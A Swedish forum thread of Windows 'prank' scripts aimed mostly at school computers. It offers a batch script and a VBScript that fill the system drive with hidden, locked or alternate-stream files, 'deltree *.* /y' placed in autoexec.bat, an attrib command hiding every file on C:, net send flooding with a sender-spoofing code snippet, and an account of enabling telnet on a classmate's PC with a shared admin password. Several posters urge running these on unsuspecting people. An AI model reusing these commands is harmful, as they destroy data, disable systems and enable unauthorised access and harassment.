Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Power
Ska sparas som en .bat eller .cmd fil. Vad jag vet så funkar det bara under svenska XP.
Vill ni att det ska funka på engelska XP så får ni ändra

echo.j|cacls "!homedrive!\pallekuling_!string!.sys" /c /d "!username!">nul
till
echo.y|cacls "!homedrive!\pallekuling_!string!.sys" /c /d "!username!">nul

Programet kommer fylla den partitionen där man har xp med filer, den gömmer och låser filerna så att användaren inte kan ta bort dom. Det tar inte många sekunder innan den är fylld för den börjar med 10 gb stora filer, när inte det finns 10 gb kvar så minskar den till 1 gb o.s.v. därför kommer den alltså att fylla upp till sista byte.

Det där programet, om det funkar som det ska, är RIKTIGT elakt.

Jag tänker testa denna snart... Någonting jag bör tänka på förutom att göra en backup på alla viktiga filer?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av SomNa
Jag tänker testa denna snart... Någonting jag bör tänka på förutom att göra en backup på alla viktiga filer?

Windows kan säker bli lite segt då det inte kommer finnas något utrymme kvar på den enheten du har windows på. Men annars så är det väll bara att tuta och köra

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem

Den här net-send grejen, hur kan det komma sig att den inte fungerar i skolnätverk?

Permalänk
Citat:

Ursprungligen inskrivet av cynomyS
Den här net-send grejen, hur kan det komma sig att den inte fungerar i skolnätverk?

troligen så har admin stängt ner tjänsten messenger.

Visa signatur

Inte kasta bäver i trähus!

Permalänk
Medlem

Nån som vet hur man stänger av messenger tjänsten så folk inte kan spamma net send till en hela tiden?

En haxxor kille gjorde det i vår skola förut (han har flyttat) han tog bort sej själv från nätverket eller nåt...ingen fattade hur han gjorde^^

Visa signatur

Träningslära - En mycket vettig träningsblogg!
Styrketräningstråden
Träningsjournal

Permalänk
Citat:

Ursprungligen inskrivet av Whoracle
snickrade ihop en fin liten loop i c++ åt en polare en gång, å han lyckligt ovetande körde programmet i skolan å det pep utav bara fan synd att jag inte hörde det.. går säkerligen att göra nått litet å lätt i batch som piper lite titt som tätt åt kamraten din

skulle lite senare försöka mej på att göra en grafisk variant (där krysset inte funkar å så ) men det blev inte som jag tänkt, så det kom inte upp någon ruta, pep en hel del och käkade upp all ram å cpukraft när jag provade det själv fick datorn 20min på sej att stänga av sej, men det orkade den inte

Någon som har lust att fixa fram ett sådant prog? Skulle vara kul att köra i skolan på icke ont anande samhällselever

(Den där öppna och stänga cd:n var ordentligt rolig )

Visa signatur

"Apokalypsens fyra Wärschare tågar in" - nienithaur

Permalänk
Medlem

Jag har ett program som heter "Frekvens" (även kallat "HöRSEL"), det är ett litet trevligt program som... piper. Upptäck själva, jag slängde upp det här.
OBS! - Det är gammalt och jag kommer inte exakt ihåg var jag hittade det, det kan bo något sorts virus i det, men jag är inte helt säker. Det ska nog inte vara några problem.

Kom ihåg att köra det i skolan - skitkul att störa tjejer som sitter och arbetar med fackuppsatser

Permalänk

ooh, jag gjorde ett sånt i basic och la in i autoexec.bat på en av datorerna i labbsalen.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Danne2k
Nån som vet hur man stänger av messenger tjänsten så folk inte kan spamma net send till en hela tiden?

En haxxor kille gjorde det i vår skola förut (han har flyttat) han tog bort sej själv från nätverket eller nåt...ingen fattade hur han gjorde^^

skriv

net stop messenger

i kör eller cmd så blir du av med messenger tjänsten och

net stop server

så syns du inte på nätverket.

Visa signatur

"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem
Citat:

skriv

net stop messenger

net stop server

okej tack

men tror inte net stop messenger gör så man inte kan ta emot några net send..har för mej att de inte hjälper, men får testa i skolan, tack!

/Danne

Visa signatur

Träningslära - En mycket vettig träningsblogg!
Styrketräningstråden
Träningsjournal

Permalänk
Medlem

SomNa:

Om du har möjlighet så följ steg 1, hoppa annars över.

1: Vänd skrivbordet 180 grader med hjälp av drivrutinerna. (Om möjligt)
2: Vänd även skärmen upp och ner så att bilden hamnar rätt, skärmen blir alldeles missfärgad och konstig på grund av gravitationen.
3: Avmagnetisera skärmen, kallas även degauss på engelska.

Följd: när din käre kollega försöker vända tillbaka skärmen så skiftar den färg precis som när du först la den upp och ner..

Kan ta ett tag att klura ut, du lär få dig ett gott skratt

Visa signatur

🛜🫀: HP 290 PRO G9, i3 14100, 8GB DDR4, Intel X520-DA2
🐳🐧: AMD R5 3600 | Google Coral.ai | ASRock X570D4U-2L2T | Silverstone CS381 | 80GB DDR4 | 8 HDD BTRFS RAID1
⌨️🎮#1: R7 5700X3D | RTX 4070 | Acer XF270HUA | 96GB @ 3600 | MSI X570 MPG GAMING EDGE
⌨️🎮#2: i5 12400F | RTX 2080 LC | Huawei GT 27 | 16GB @ 3600 | MSI B760M-P DDR4 | CORSAIR C70
🎞🎶: LG OLED55C8 | Epson TW3200 | Onkyo TX-NR646 | Infinity Reference 61/51 mk2 | Shield TV V2 | minhembio.com

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Danne2k
okej tack

men tror inte net stop messenger gör så man inte kan ta emot några net send..har för mej att de inte hjälper, men får testa i skolan, tack!

/Danne

Det hjälper. Stänger man av messenger så kan man inte skicka eller ta emot sådana meddelanden.

Visa signatur

Vill du ha svar? Citera mig gärna.

Permalänk
Hedersmedlem

Ytterst intressant tråd

Ska nog dra fram en av sunkburkarna i helgen och leka lite. Har varit dos-fri alldeles för länge nu.

deltree *.* /y

direkt i autoexec.bat funkade bra på dos-tiden Deltree verkar numera vara borttaget (xppro i skolan)

atrib c:\ /s /d +r +h +s +a

Detta borde kunna ge vissa roliga effekter. Samtliga filer på hela C: blir dolda och skrivskyddade. Kan annars utnyttjas på save-filer till äldre spel, det brukar kunna ge bra effekt

Visa signatur

|| SWECLOCKERS.COM || oskar@sweclockers.com || OSkar000.se || Fototråden ||
|| Gundeman || Bartonofix || GundemanX2 || Obelinux || Nexofix || Filofix || Ircofix ||
|| Tillse att hjärnan är inkopplad innan fingrarna vidrör tangentbordet ||
|| D300 | D700 | 24/2,8 | 28/2,8 | 35/2 | 50/1,8 | 55/2,8 | 85/1,8 | 105/2,5 | 200/4 | 300/4,5 | 10-20 | 24-70/2,8 | 75-150/3,5 | 80-200/2,8 ||

Permalänk
Medlem

Set cmd = CreateObject("WScript.Shell") Set sys = CreateObject("Scripting.FileSystemObject") Set info = cmd.Environment("PROCESS") cmd.Run "fsutil file createnew " & info("SYSTEMROOT") & "\system32\kernel32.dll:batman " & sys.GetDrive(info("SYSTEMDRIVE")).FreeSpace,0,true

Ny bättre verison av hdd ätaren. Tar inte ens en sekund och för att bli av med det så måste man tabort kernel32.dll :). Kan gå att fixa på annat vis, men jag är inte säker.

Spara i en vbs fil och kör.

Visa signatur

Permalänk
Medlem

haha! Rolig tråd! nu ska ni få höra på en rolig net send grej vi gjorde i veckan i skolan:
Vi hade en tråkig vanlig tyska lektion och skulle gå till datasalen och söka efter information om kantoner... men orka de:P, Så ja började skicka net send i stället. Jag skrev "net send /domain lol" och då kommer det upp på alla datorer i datasalen.. Dom andra Nissarna i tyskan blev ju intreserade över hur jag gjorde och kollade på min skärm va jag skrev i cmd, så efter 5sec så började alla skicka net send.. efter ett tag så blev de lite överdrivet och en skrev "net send /domian ååhh va skön du va igår lena\\erik".. Lena heter våran tyska lärare.. senn var lektionen slut.. Och nästa dag så ska vi till datorsalen igen och fortsätta med kantonerna..Men de blev inget net send för skolans it ansvarige Sture man, var inne å kollade på datorerna vilka det var som hade skickat net send, och de var ju förstås alla vi i tyskan. Han började kolla vilka det var som satt vid vilka datorer föregående dag å frågade om det var vi som hade skickat net send och alla knep käft å han blev skit sur, han drog säkert ett föredrag i 10min att sånnt fick vi absolut inte göra, och senn fick höra att nätverket i kommunen hade varit nere senns i går, pga vårat net send skickande:D.. och vi fick reda på att meddelandena visst gick ända till kommunhuset och alla skolor i kommunen.. inte bara till datorsalen. alla satt knäpptysta... nästa dag så fick alla prata enskilt med dom it ansvariga på skolan.. eftersom de var "obscena" texter som dom kallar det så kommer polis anmälan göras, vi kommer även bli avstängda från datorerna.. VI ligger RISIGT till, om man säger så.. allt från mej \\KulanZ

Visa signatur

AMD Ryzen 7 5800XASUS Prime X570-P64 GB DDR4WD Black SN850 M.2 - 1TBNvidia GeForce GTX 1060 6 GBCorsair RM750X V2DEEPCOOL GAMMAXX L240 V2Fractal Design Define R5

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av KulanZ
haha! Rolig tråd! nu ska ni få höra på en rolig net send grej vi gjorde i veckan i skolan:
Vi hade en tråkig vanlig tyska lektion och skulle gå till datasalen och söka efter information om kantoner... men orka de:P, Så ja började skicka net send i stället. Jag skrev "net send /domain lol" och då kommer det upp på alla datorer i datasalen.. Dom andra Nissarna i tyskan blev ju intreserade över hur jag gjorde och kollade på min skärm va jag skrev i cmd, så efter 5sec så började alla skicka net send.. efter ett tag så blev de lite överdrivet och en skrev "net send /domian ååhh va skön du va igår lena\\erik".. Lena heter våran tyska lärare.. senn var lektionen slut.. Och nästa dag så ska vi till datorsalen igen och fortsätta med kantonerna..Men de blev inget net send för skolans it ansvarige Sture man, var inne å kollade på datorerna vilka det var som hade skickat net send, och de var ju förstås alla vi i tyskan. Han började kolla vilka det var som satt vid vilka datorer föregående dag å frågade om det var vi som hade skickat net send och alla knep käft å han blev skit sur, han drog säkert ett föredrag i 10min att sånnt fick vi absolut inte göra, och senn fick höra att nätverket i kommunen hade varit nere senns i går, pga vårat net send skickande:D.. och vi fick reda på att meddelandena visst gick ända till kommunhuset och alla skolor i kommunen.. inte bara till datorsalen. alla satt knäpptysta... nästa dag så fick alla prata enskilt med dom it ansvariga på skolan.. eftersom de var "obscena" texter som dom kallar det så kommer polis anmälan göras, vi kommer även bli avstängda från datorerna.. VI ligger RISIGT till, om man säger så.. allt från mej \\KulanZ

HEHE måste bara få skriva....LOL HAHA fan va kul kanske inte det med polisanmälan men allt de andra hehe...

Vi hade nåt liknande på skolan när vi satt i ena datasalen... Jag har hur tråkigt som helst så jag börjar skriva net send till alla som jag känner där och alla blir så imponerade (Cooling) och frågar genast hur man gör.....jag instruerar dom att skriva net send * meddelande.... då kommer det till alla i nätverket, och vips ojdå så får alla på hela skolan upp diverse snuskiga meddelanden och jag har loggat ut och går på toa men typ 1 minut efter jag gått så stormar den sura datornissen in dit och skäller ut dom som skrivit..... Det bästa var att jag inte var där så dom kunde inte skylla ifrån sig på mig.....

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av oskifer
HEHE måste bara få skriva....LOL HAHA fan va kul kanske inte det med polisanmälan men allt de andra hehe...

Vi hade nåt liknande på skolan när vi satt i ena datasalen... Jag har hur tråkigt som helst så jag börjar skriva net send till alla som jag känner där och alla blir så imponerade (Cooling) och frågar genast hur man gör.....jag instruerar dom att skriva net send * meddelande.... då kommer det till alla i nätverket, och vips ojdå så får alla på hela skolan upp diverse snuskiga meddelanden och jag har loggat ut och går på toa men typ 1 minut efter jag gått så stormar den sura datornissen in dit och skäller ut dom som skrivit..... Det bästa var att jag inte var där så dom kunde inte skylla ifrån sig på mig.....

haha där hade du tur:D.. men ja hörde nyss att det inte kommer bli någon polis anmälan!

Visa signatur

AMD Ryzen 7 5800XASUS Prime X570-P64 GB DDR4WD Black SN850 M.2 - 1TBNvidia GeForce GTX 1060 6 GBCorsair RM750X V2DEEPCOOL GAMMAXX L240 V2Fractal Design Define R5

Permalänk
Medlem
Citat:

Set cmd = CreateObject("WScript.Shell") Set sys = CreateObject("Scripting.FileSystemObject") Set info = cmd.Environment("PROCESS") cmd.Run "fsutil file createnew " & info("SYSTEMROOT") & "\system32\kernel32.dll:batman " & sys.GetDrive(info("SYSTEMDRIVE")).FreeSpace,0,true

Ny bättre verison av hdd ätaren. Tar inte ens en sekund och för att bli av med det så måste man tabort kernel32.dll :). Kan gå att fixa på annat vis, men jag är inte säker.

Spara i en vbs fil och kör.

Den ska vi testa innan nästa formatering

Visa signatur

Lian Li PC7SE | Athlon 2800+ | 2x 512MB | Leadtek 6800LE 16/1,6 @ 1,3v 400/870 | 250 + 160 + 2x 200 + 40 = 850GB
Pergo-kuben | Pergomodd2 | PSX-modd | HTPC i CD-spelare | Pergo-tower

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av KulanZ
haha där hade du tur:D.. men ja hörde nyss att det inte kommer bli någon polis anmälan!

Hehe något....du med förresten...!

Permalänk
Medlem

Någon som kan "dela" på .vbs skriptet om cd-enheten?

Jag vill ha så att jag själv kan "bestämma" när cd-enheten ska in och ut...
Två olika skript, går det?

Visa signatur

Rasmus Lindell
Webmaster

Permalänk
Medlem
Permalänk
Medlem
Citat:

Ursprungligen inskrivet av oskifer
nej

vad är problemet? varför skulle det INTE gå?

Visa signatur

i7-4770K @ 3.5GHz - 32GB RAM - 2x 500GB SSD - 40TB HDD - GTX770

Permalänk
Medlem
Citat:

skriv

net stop messenger

net stop server

Så om jag sänder en massa net send meddelanden till alla i hela min skolas nätverk (vilket jag gjorde för inte så länge sen) och sedan skriver net stop server kan inte skolans data hacker hitta den skyldige?

Visa signatur

Nvidia 7800 GT, AMD64 3500+, 1024MB RAM.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Magnetic
Så om jag sänder en massa net send meddelanden till alla i hela min skolas nätverk (vilket jag gjorde för inte så länge sen) och sedan skriver net stop server kan inte skolans data hacker hitta den skyldige?

öhm jo för det står din IP-adress / hostname så dem vet rätt lätt vem det va som gjorde det

Visa signatur

Permalänk
Medlem
Citat:

Däremot kan du själv slippa få meddelanden

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Frigolit
vad är problemet? varför skulle det INTE gå?

För att det är samma kommando för att köra ut släden som det är för att ta in den. Kanske kan gå att se om släden är ute eller inte, det är väll bara att testa sig fram.

Citat:

Du kan göra ett C++ program som funkar exakt som net send, bara att man själv kan välja avsändar namn. Vet inte hur svårt det är att göra, men någon som kan C++ rätt hyfsat borde kunna slänga ihop rätt snabbt.

NetMessageBufferSend( NULL, server, from, (byte *) &msg,wcslen( msg ) * 2 ); NetMessageNameDel(NULL,A2W("RECTOR")); // "server" is a Unicode string containing IP Address // whom you want to send // "from" is the actual field which makes it all happen. //It is Unicode string and it contains the name from // which this message is coming from. So you can specify // any anonymous name and it will appear on receiver end // we are multiplying the length of message by 2 //because it is a Unicode string which //corresponds to 2 Bytes for a single character NetMessageBufferSend The NetMessageBufferSend function sends a buffer of information to a registered message alias. NET_API_STATUS NetMessageBufferSend( LPCWSTR servername, LPCWSTR msgname, LPCWSTR fromname, LPBYTE buf, DWORD buflen ); Parameters servername [in] Pointer to a constant string that specifies the DNS or NetBIOS name of the remote server on which the function is to execute. If this parameter is NULL, the local computer is used. Windows NT: This string must begin with \\. msgname [in] Pointer to a constant string that specifies the message alias to which the message buffer should be sent. fromname [in] Pointer to a constant string specifying who the message is from. If this parameter is NULL, the message is sent from the local computer name. buf [in] Pointer to a buffer that contains the message text. For more information, see Network Management Function Buffers. buflen [in] Specifies a value that contains the length, in bytes, of the message text pointed to by the buf parameter.

Visa signatur

Permalänk
Medlem

jag sitter på ett lan just nu, och tänkte att det vore jävligt häftigt om allas datorer öppnade cd/dvd-läsarna. kan någon fixa ett sånt lite snabbt?

Visa signatur
Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Frigolit
öhm jo för det står din IP-adress / hostname så dem vet rätt lätt vem det va som gjorde det

Okej.. Men kan man göra en kod som man skicka till en speciell dator i nätverket som gör att den datorn sänder ut ett meddelande till hela nätverket.
Kan skolans hacker hitta mig?

Visa signatur

Nvidia 7800 GT, AMD64 3500+, 1024MB RAM.

Permalänk
Medlem
Citat:

Okej.. Men kan man göra en kod som man skicka till en speciell dator i nätverket som gör att den datorn sänder ut ett meddelande till hela nätverket.
Kan skolans hacker hitta mig?

hehe, klart det går ^__^

vi va lite elaka i min skola, för där har alla som standard samma administratörs lösenord
så jag gick in via "Datorhantering" och slog på telnet på nån snubbes dator
sen telnettade min kompis in och net sendade så det stod härliga till

Visa signatur

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av ^QuikSilver^
SomNa:

Om du har möjlighet så följ steg 1, hoppa annars över.

1: Vänd skrivbordet 180 grader med hjälp av drivrutinerna. (Om möjligt)
2: Vänd även skärmen upp och ner så att bilden hamnar rätt, skärmen blir alldeles missfärgad och konstig på grund av gravitationen.
3: Avmagnetisera skärmen, kallas även degauss på engelska.

Följd: när din käre kollega försöker vända tillbaka skärmen så skiftar den färg precis som när du först la den upp och ner..

Kan ta ett tag att klura ut, du lär få dig ett gott skratt

Rolig idé!

Synd dock att vi har bärbara datorer som dels är lite svåra att vända upp och ner, och dels rätt omöjliga att avmagnitisera

---------------------------------------

Skulle vara glad om någon kunnig kunde hjälpa mig i denna tråd:
http://forum.sweclockers.com/showthread.php?s=&threadid=46696...